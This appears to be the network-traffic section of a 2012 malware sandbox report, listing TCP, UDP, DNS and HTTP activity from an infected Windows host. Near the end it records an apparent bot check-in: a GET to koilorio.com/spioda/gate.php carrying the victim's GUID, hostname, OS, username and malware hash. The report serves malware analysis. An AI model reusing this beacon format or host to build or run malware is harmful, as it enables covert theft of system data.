Jul 2, 2012 20:07:08.969201088 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:08.990871906 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:08.991242886 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:08.991267920 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:09.036461115 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:09.036813021 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:09.036840916 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:09.080611944 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:09.081000090 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:09.081034899 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:09.130589008 CEST	80	1049	173.194.69.120	192.168.0.10
Jul 2, 2012 20:07:09.153019905 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:09.153080940 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:09.161402941 CEST	80	1049	173.194.69.120	192.168.0.10
Jul 2, 2012 20:07:09.161811113 CEST	1049	80	192.168.0.10	173.194.69.120
Jul 2, 2012 20:07:09.161865950 CEST	80	1049	173.194.69.120	192.168.0.10
Jul 2, 2012 20:07:09.283905029 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:09.284403086 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:09.284487009 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:09.291626930 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:09.292078018 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:09.292150974 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:09.292565107 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:09.332711935 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:09.360915899 CEST	1049	80	192.168.0.10	173.194.69.120
Jul 2, 2012 20:07:09.361010075 CEST	80	1049	173.194.69.120	192.168.0.10
Jul 2, 2012 20:07:09.384169102 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:09.384706974 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:09.384790897 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:09.405993938 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:09.406531096 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:09.406615019 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:09.430238008 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:09.430798054 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:09.430859089 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:09.468534946 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:09.469044924 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:09.469116926 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:09.470354080 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:09.470750093 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:09.470772982 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:09.510322094 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:09.510878086 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:09.510947943 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:09.563890934 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:09.564403057 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:09.564476013 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:09.564919949 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:09.576770067 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:09.576777935 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:09.577310085 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:09.579241037 CEST	1049	80	192.168.0.10	173.194.69.120
Jul 2, 2012 20:07:09.588815928 CEST	80	1049	173.194.69.120	192.168.0.10
Jul 2, 2012 20:07:09.596049070 CEST	80	1049	173.194.69.120	192.168.0.10
Jul 2, 2012 20:07:09.596611023 CEST	1049	80	192.168.0.10	173.194.69.120
Jul 2, 2012 20:07:09.596677065 CEST	80	1049	173.194.69.120	192.168.0.10
Jul 2, 2012 20:07:09.597043991 CEST	1049	80	192.168.0.10	173.194.69.120
Jul 2, 2012 20:07:09.613528967 CEST	80	1049	173.194.69.120	192.168.0.10
Jul 2, 2012 20:07:09.642311096 CEST	80	1049	173.194.69.120	192.168.0.10
Jul 2, 2012 20:07:09.642848015 CEST	1049	80	192.168.0.10	173.194.69.120
Jul 2, 2012 20:07:09.642918110 CEST	80	1049	173.194.69.120	192.168.0.10
Jul 2, 2012 20:07:09.644051075 CEST	80	1049	173.194.69.120	192.168.0.10
Jul 2, 2012 20:07:09.644457102 CEST	1049	80	192.168.0.10	173.194.69.120
Jul 2, 2012 20:07:09.644479036 CEST	80	1049	173.194.69.120	192.168.0.10
Jul 2, 2012 20:07:09.676295996 CEST	80	1049	173.194.69.120	192.168.0.10
Jul 2, 2012 20:07:09.676717043 CEST	1049	80	192.168.0.10	173.194.69.120
Jul 2, 2012 20:07:09.676795959 CEST	80	1049	173.194.69.120	192.168.0.10
Jul 2, 2012 20:07:09.707706928 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:09.714277983 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:09.714746952 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:09.714823008 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:09.779797077 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:09.780374050 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:09.780447960 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:09.780920029 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:09.787118912 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:09.798619032 CEST	1049	80	192.168.0.10	173.194.69.120
Jul 2, 2012 20:07:09.798686028 CEST	80	1049	173.194.69.120	192.168.0.10
Jul 2, 2012 20:07:09.802855015 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:09.803256989 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:09.803299904 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:09.831511021 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:09.831927061 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:09.832001925 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:09.858119965 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:09.858535051 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:09.858603954 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:09.879225016 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:09.879656076 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:09.879718065 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:09.880162954 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:09.880176067 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:09.940203905 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:09.940666914 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:09.940691948 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:09.941047907 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:09.958419085 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.002856970 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.003431082 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:10.003508091 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.004029036 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:10.016690969 CEST	1049	80	192.168.0.10	173.194.69.120
Jul 2, 2012 20:07:10.025244951 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.047358036 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.047863960 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:10.047933102 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.075406075 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.075936079 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:10.076003075 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.116967916 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.117497921 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:10.117567062 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.117901087 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:10.133933067 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.156694889 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.157134056 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:10.157221079 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.178610086 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.179145098 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:10.179213047 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.250814915 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.251349926 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:10.251436949 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.251575947 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.251997948 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:10.252017975 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.252743959 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:10.273516893 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.273525953 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.273725033 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.274017096 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:10.274259090 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:10.274282932 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.274611950 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:10.279328108 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.301939011 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.302248001 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:10.302284002 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.302596092 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:10.312586069 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.324343920 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.324656963 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:10.324677944 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.335477114 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.335803032 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:10.335828066 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.336056948 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:10.347271919 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.360161066 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.360572100 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:10.360594988 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.360807896 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:10.369653940 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.370345116 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.370613098 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:10.370644093 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.370843887 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:10.386346102 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.392170906 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.392602921 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:10.392640114 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.414192915 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.414618015 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:10.414644957 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.427463055 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.427778006 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.427844048 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:10.427870989 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.428145885 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:10.435906887 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.449217081 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.452572107 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:10.452599049 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.456146955 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:10.470128059 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.471072912 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.471424103 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:10.471489906 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.478858948 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:10.492105007 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.492114067 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.492556095 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:10.495990992 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:10.505018950 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.506606102 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.506946087 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:10.507013083 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.513869047 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.513916969 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.514270067 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:10.514332056 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.514358044 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:10.607983112 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:10.608038902 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:10.619677067 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:11.673084974 CEST	1045	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:11.673168898 CEST	80	1045	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:11.705770969 CEST	1043	80	192.168.0.10	173.194.69.106
Jul 2, 2012 20:07:11.705852985 CEST	80	1043	173.194.69.106	192.168.0.10
Jul 2, 2012 20:07:11.751661062 CEST	1049	80	192.168.0.10	173.194.69.120
Jul 2, 2012 20:07:11.751739979 CEST	80	1049	173.194.69.120	192.168.0.10
Jul 2, 2012 20:07:11.793359041 CEST	1044	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:11.793430090 CEST	80	1044	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:11.972590923 CEST	80	1049	173.194.69.120	192.168.0.10
Jul 2, 2012 20:07:11.993705988 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:11.993779898 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:12.016269922 CEST	80	1049	173.194.69.120	192.168.0.10
Jul 2, 2012 20:07:12.016705036 CEST	1049	80	192.168.0.10	173.194.69.120
Jul 2, 2012 20:07:12.016779900 CEST	80	1049	173.194.69.120	192.168.0.10
Jul 2, 2012 20:07:12.058151960 CEST	80	1049	173.194.69.120	192.168.0.10
Jul 2, 2012 20:07:12.058594942 CEST	1049	80	192.168.0.10	173.194.69.120
Jul 2, 2012 20:07:12.058676004 CEST	80	1049	173.194.69.120	192.168.0.10
Jul 2, 2012 20:07:12.059053898 CEST	1049	80	192.168.0.10	173.194.69.120
Jul 2, 2012 20:07:12.070785046 CEST	80	1049	173.194.69.120	192.168.0.10
Jul 2, 2012 20:07:12.093938112 CEST	80	1049	173.194.69.120	192.168.0.10
Jul 2, 2012 20:07:12.094331980 CEST	1049	80	192.168.0.10	173.194.69.120
Jul 2, 2012 20:07:12.094398975 CEST	80	1049	173.194.69.120	192.168.0.10
Jul 2, 2012 20:07:12.136790991 CEST	80	1049	173.194.69.120	192.168.0.10
Jul 2, 2012 20:07:12.137186050 CEST	1049	80	192.168.0.10	173.194.69.120
Jul 2, 2012 20:07:12.137271881 CEST	80	1049	173.194.69.120	192.168.0.10
Jul 2, 2012 20:07:12.153990984 CEST	80	1049	173.194.69.120	192.168.0.10
Jul 2, 2012 20:07:12.154455900 CEST	1049	80	192.168.0.10	173.194.69.120
Jul 2, 2012 20:07:12.154547930 CEST	80	1049	173.194.69.120	192.168.0.10
Jul 2, 2012 20:07:12.158808947 CEST	80	1049	173.194.69.120	192.168.0.10
Jul 2, 2012 20:07:12.158823967 CEST	80	1045	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:12.159255981 CEST	1049	80	192.168.0.10	173.194.69.120
Jul 2, 2012 20:07:12.159367085 CEST	80	1049	173.194.69.120	192.168.0.10
Jul 2, 2012 20:07:12.313704014 CEST	1045	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:12.313788891 CEST	80	1045	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:12.313810110 CEST	1049	80	192.168.0.10	173.194.69.120
Jul 2, 2012 20:07:12.321307898 CEST	80	1045	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:12.321748018 CEST	1045	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:12.321825027 CEST	80	1045	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:12.322211027 CEST	1045	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:12.343194962 CEST	80	1045	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:12.363317013 CEST	80	1045	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:12.363745928 CEST	1045	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:12.363827944 CEST	80	1045	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:12.364198923 CEST	1045	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:12.365464926 CEST	80	1045	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:12.365473986 CEST	80	1045	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:12.365483046 CEST	80	1043	173.194.69.106	192.168.0.10
Jul 2, 2012 20:07:12.365907907 CEST	1045	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:12.377383947 CEST	80	1044	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:12.388281107 CEST	80	1044	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:12.388685942 CEST	1044	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:12.388756037 CEST	80	1044	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:12.410770893 CEST	80	1044	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:12.410785913 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:12.411207914 CEST	1044	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:12.411273003 CEST	80	1044	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:12.544430971 CEST	1043	80	192.168.0.10	173.194.69.106
Jul 2, 2012 20:07:12.544452906 CEST	80	1043	173.194.69.106	192.168.0.10
Jul 2, 2012 20:07:12.544473886 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:12.544497013 CEST	1044	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:12.751091003 CEST	1043	80	192.168.0.10	173.194.69.106
Jul 2, 2012 20:07:27.733908892 CEST	80	1045	199.7.71.190	192.168.0.10
Jul 2, 2012 20:07:27.734275103 CEST	1045	80	192.168.0.10	199.7.71.190

All UDP
Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 2, 2012 20:06:19.292897940 CEST	51208	53	192.168.0.10	195.186.1.121
Jul 2, 2012 20:06:20.365220070 CEST	51208	53	192.168.0.10	195.186.4.121
Jul 2, 2012 20:06:20.769155025 CEST	53	51208	195.186.1.121	192.168.0.10
Jul 2, 2012 20:06:21.305716991 CEST	53	51208	195.186.4.121	192.168.0.10
Jul 2, 2012 20:06:39.563674927 CEST	51094	53	192.168.0.10	195.186.1.121
Jul 2, 2012 20:06:39.563788891 CEST	53	51094	195.186.1.121	192.168.0.10
Jul 2, 2012 20:06:45.446321011 CEST	58466	53	192.168.0.10	195.186.1.121
Jul 2, 2012 20:06:45.446424007 CEST	53	58466	195.186.1.121	192.168.0.10
Jul 2, 2012 20:06:46.078927040 CEST	63631	53	192.168.0.10	195.186.1.121
Jul 2, 2012 20:06:46.078990936 CEST	53	63631	195.186.1.121	192.168.0.10
Jul 2, 2012 20:06:56.552406073 CEST	51272	53	192.168.0.10	195.186.1.121
Jul 2, 2012 20:06:57.595263004 CEST	51272	53	192.168.0.10	195.186.4.121
Jul 2, 2012 20:06:57.952739000 CEST	53	51272	195.186.1.121	192.168.0.10
Jul 2, 2012 20:06:58.516155958 CEST	53	51272	195.186.4.121	192.168.0.10
Jul 2, 2012 20:06:58.804406881 CEST	63632	53	192.168.0.10	195.186.1.121
Jul 2, 2012 20:06:59.797770023 CEST	63632	53	192.168.0.10	195.186.4.121
Jul 2, 2012 20:07:00.452718019 CEST	53	63632	195.186.1.121	192.168.0.10
Jul 2, 2012 20:07:00.774555922 CEST	53	63632	195.186.4.121	192.168.0.10
Jul 2, 2012 20:07:05.355597973 CEST	52775	53	192.168.0.10	195.186.1.121
Jul 2, 2012 20:07:05.355767012 CEST	53	52775	195.186.1.121	192.168.0.10

All ICMP
Timestamp	Source IP	Dest IP	Checksum	Code	Type
Jul 2, 2012 20:06:21.306183100 CEST	192.168.0.10	195.186.4.121	862a	(Port unreachable)	Destination Unreachable
Jul 2, 2012 20:06:58.516316891 CEST	192.168.0.10	195.186.4.121	862e	(Port unreachable)	Destination Unreachable
Jul 2, 2012 20:07:00.775059938 CEST	192.168.0.10	195.186.4.121	863a	(Port unreachable)	Destination Unreachable

DNS Query
Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jul 2, 2012 20:06:19.292897940 CEST	192.168.0.10	195.186.1.121	0x27e7	Standard query (0)	koilorio.com	A (IP address)	IN (0x0001)
Jul 2, 2012 20:06:20.365220070 CEST	192.168.0.10	195.186.4.121	0x27e7	Standard query (0)	koilorio.com	A (IP address)	IN (0x0001)
Jul 2, 2012 20:06:45.446321011 CEST	192.168.0.10	195.186.1.121	0x6094	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Jul 2, 2012 20:06:46.078927040 CEST	192.168.0.10	195.186.1.121	0x3e12	Standard query (0)	www.google.fr	A (IP address)	IN (0x0001)
Jul 2, 2012 20:06:56.552406073 CEST	192.168.0.10	195.186.1.121	0xfa71	Standard query (0)	crl.verisign.com	A (IP address)	IN (0x0001)
Jul 2, 2012 20:06:57.595263004 CEST	192.168.0.10	195.186.4.121	0xfa71	Standard query (0)	crl.verisign.com	A (IP address)	IN (0x0001)
Jul 2, 2012 20:06:58.804406881 CEST	192.168.0.10	195.186.1.121	0x92cd	Standard query (0)	csc3-2009-2-crl.verisign.com	A (IP address)	IN (0x0001)
Jul 2, 2012 20:06:59.797770023 CEST	192.168.0.10	195.186.4.121	0x92cd	Standard query (0)	csc3-2009-2-crl.verisign.com	A (IP address)	IN (0x0001)
Jul 2, 2012 20:07:05.355597973 CEST	192.168.0.10	195.186.1.121	0x3aa2	Standard query (0)	ssl.gstatic.com	A (IP address)	IN (0x0001)

DNS Answer
Timestamp	Source IP	Dest IP	Trans ID	Replay Code	Name	CName	Address	Type	Class
Jul 2, 2012 20:06:20.769155025 CEST	195.186.1.121	192.168.0.10	0x27e7	No error (0)	koilorio.com		23.23.227.68	A (IP address)	IN (0x0001)
Jul 2, 2012 20:06:21.305716991 CEST	195.186.4.121	192.168.0.10	0x27e7	No error (0)	koilorio.com		23.23.227.68	A (IP address)	IN (0x0001)
Jul 2, 2012 20:06:45.446424007 CEST	195.186.1.121	192.168.0.10	0x6094	No error (0)	www.google.com		173.194.69.106	A (IP address)	IN (0x0001)
Jul 2, 2012 20:06:46.078990936 CEST	195.186.1.121	192.168.0.10	0x3e12	No error (0)	www.google.fr		173.194.69.94	A (IP address)	IN (0x0001)
Jul 2, 2012 20:06:57.952739000 CEST	195.186.1.121	192.168.0.10	0xfa71	No error (0)	crl.verisign.com		199.7.71.190	A (IP address)	IN (0x0001)
Jul 2, 2012 20:06:58.516155958 CEST	195.186.4.121	192.168.0.10	0xfa71	No error (0)	crl.verisign.com		199.7.71.190	A (IP address)	IN (0x0001)
Jul 2, 2012 20:07:00.452718019 CEST	195.186.1.121	192.168.0.10	0x92cd	No error (0)	csc3-2009-2-crl.verisign.com		199.7.52.190	A (IP address)	IN (0x0001)
Jul 2, 2012 20:07:00.774555922 CEST	195.186.4.121	192.168.0.10	0x92cd	No error (0)	csc3-2009-2-crl.verisign.com		199.7.52.190	A (IP address)	IN (0x0001)
Jul 2, 2012 20:07:05.355767012 CEST	195.186.1.121	192.168.0.10	0x3aa2	No error (0)	ssl.gstatic.com		173.194.69.120	A (IP address)	IN (0x0001)

HTTP Dependency Graph

koilorio.com

www.google.com

www.google.fr

ssl.gstatic.com

www.google.com

crl.verisign.com

csc3-2009-2-crl.verisign.com

HTTP
Timestamp	Source Port	Dest Port	Source IP	Dest IP	Header	Total Bytes Transfered (KB)
Jul 2, 2012 20:06:22.630816936 CEST	1040	80	192.168.0.10	23.23.227.68	GET /spioda/gate.php?guid=5.1.2600!HANUELE-BC60720!14D7C316&ver=10304&ie=8.0.6001.18702&os=5.1.2600&ut=Admin&ccrc=547451B4&md5=7db482f5469dfeb0a6b2b4f66c062314&plg=customconnector;rst_1_1&stat=online HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: koilorio.com Cache-Control: no-cache	1
Jul 2, 2012 20:06:23.338170052 CEST	80	1040	23.23.227.68	192.168.0.10	HTTP/1.1 404 Not Found Date: Mon, 02 Jul 2012 18:06:23 GMT Server: Apache Vary: Accept-Encoding Content-Length: 213 Content-Type: text/html; charset=iso-8859-1	2
